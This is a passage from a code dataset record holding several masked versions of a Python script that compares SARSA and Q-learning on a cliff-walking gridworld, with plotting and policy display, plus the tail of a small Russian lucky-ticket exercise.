"step-4": "def lucky(ticket):\n\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\nlastTicket = 123456\nprint(lucky(100001))\nlastTicket = 123321\nprint(lucky(100001))\n",
"step-5": "# Алексей Головлев, группа БСБО-07-19\n\ndef lucky(ticket):\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\nlastTicket = 123456\nprint(lucky(100001))\n\nlastTicket = 123321\nprint(lucky(100001))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
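The digit-sum check in the row above can also be written without the lastTicket global; a hedged refactor sketch in which str.zfill replaces the manual zero-padding loop (output strings kept as in the sample):

def halves_sum_equal(number):
    digits = list(map(int, str(number).zfill(6)))  # pad to six digits
    return sum(digits[:3]) == sum(digits[3:])

def lucky(ticket, last_ticket):
    same = halves_sum_equal(ticket) == halves_sum_equal(last_ticket)
    return 'Счастливый' if same else 'Несчастливый'

print(lucky(100001, 123456))  # Несчастливый: 100001 balances (1 == 1) but 123456 does not
print(lucky(100001, 123321))  # Счастливый: both tickets match their own halves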
<|reserved_special_token_0|>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
from random import random, randint

import numpy as np
import matplotlib.pyplot as plt
from colorama import Back, Style

from gridworld import q_to_arrow
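
# Cliff-walking gridworld: the agent starts in the bottom-left corner and must
# reach the bottom-right goal; the cells between them form a cliff that costs
# -100 and ends the episode. SARSA and Q-learning are trained and compared for
# several values of epsilon.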
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
# north, east, south, west
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
# This is the set of states, all initialised with default values
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
# make the cliff
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
# The reward function defines the reward for transitioning from state s_1 to state s_2
def reward(s_1, s_2):
if (s_1.is_goal or s_1.is_cliff):
return 0
elif (s_2.is_goal):
return 10
elif (s_2.is_cliff):
return -100
else:
return -1
""" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the "states" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a "difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left"""
def transition(stsp, s, di, dj):
if (s.is_cliff or s.is_goal):
return s
elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):
return s
else:
return stsp[s.i + di][s.j + dj]
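
# Example (sketch, comments only): stepping east from the start lands on the first
# cliff cell, while stepping west is blocked by the boundary and returns the start:
#   states = initialize_states()
#   start = states[N_ROWS - 1][0]               # bottom-left corner
#   transition(states, start, 0, 1).is_cliff    # -> True
#   transition(states, start, 0, -1) is start   # -> True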
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0: # NORTH
return -1, 0
elif action == 1: # EAST
return 0, 1
elif action == 2: # SOUTH
return 1, 0
elif action == 3: # WEST
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])
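
# SARSA is on-policy: the TD target uses the Q-value of the action a' that the
# epsilon-greedy behaviour policy actually picked in the next state,
#   Q(s, a) <- Q(s, a) + alpha * (r + gamma * Q(s', a') - Q(s, a)),
# with alpha = learning_rate and r = reward(s, s').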
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])
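
# Q-learning is off-policy: the TD target bootstraps from the greedy value of the
# next state, regardless of which action will actually be taken there,
#   Q(s, a) <- Q(s, a) + alpha * (r + gamma * max_a' Q(s', a') - Q(s, a)).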
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 0.00001
epsilon = _epsilon
episode_rewards = []
mistakes_array = [] # array which tracks error from convergence on each step
for i in range(N_STEPS):
        # start every episode in the bottom-left corner of the grid
        current_state = states[N_ROWS - 1][0]

        # decay epsilon (decay = 1 keeps it constant) and run until a terminal state
        epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)
# print(current_state, next_state, action_to_verbose(next_action), di, dj)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
        # if i % 100 == 0:
        #     print(i)
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
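
# Example (sketch): a single Q-learning run with epsilon = 0.1 would be
#   errors, final_states, cumulative_rewards = run_code(use_q_learning=True, _epsilon=0.1)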
def check_accuracy(states):
correct_result = np.array([
[-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],
[-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],
[-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],
[0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],
[1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],
[0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],
])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))
return mistakes_delta
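
# Each entry of correct_result is the optimal value under gamma = 1: every move
# costs -1 and entering the goal pays +10, so a cell that is n moves away from the
# goal is worth 10 - (n - 1). Terminal cells (cliff and goal) are never updated
# and stay at 0; the start cell in the bottom-left also happens to be worth 0.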
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append(r'SARSA $\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append(r'Q-learning $\epsilon={}$'.format(mistake_q_learning[0]))
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
# plt.show()
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),
ha="center", va="center", color="w")
fig.tight_layout()
ax.set_title("{}; $\epsilon={}$".format(method, epsilon))
for i in range(N_ROWS):
str_ = ""
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ", "
PLOTS += 1
# plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))
# plt.show()
def display_optimal_policy(states, method, epsilon):
print("{}; ε = {}".format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
    print('invalid method: must be Q_LEARNING, SARSA or BOTH')
    import sys
    sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for run in rewards:
    plt.plot(run[2], label='{} ε = {} '.format(run[0], run[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.savefig('episode_rewards.png')  # save before show(): show() empties the current figure
plt.show()
plot_errors(mistakes_sarsa, mistakes_q_learning)
|
flexible
|
{
"blob_id": "cb2e800cc2802031847b170a462778e5c0b3c6f9",
"index": 40,
"step-1": "<mask token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<mask token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\n<mask token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', 
end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<mask token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<mask token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\n<mask token>\n\n\ndef 
plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\n<mask token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<mask token>\n",
"step-3": "<mask token>\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n 
mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. 
must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n",
"step-4": "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n 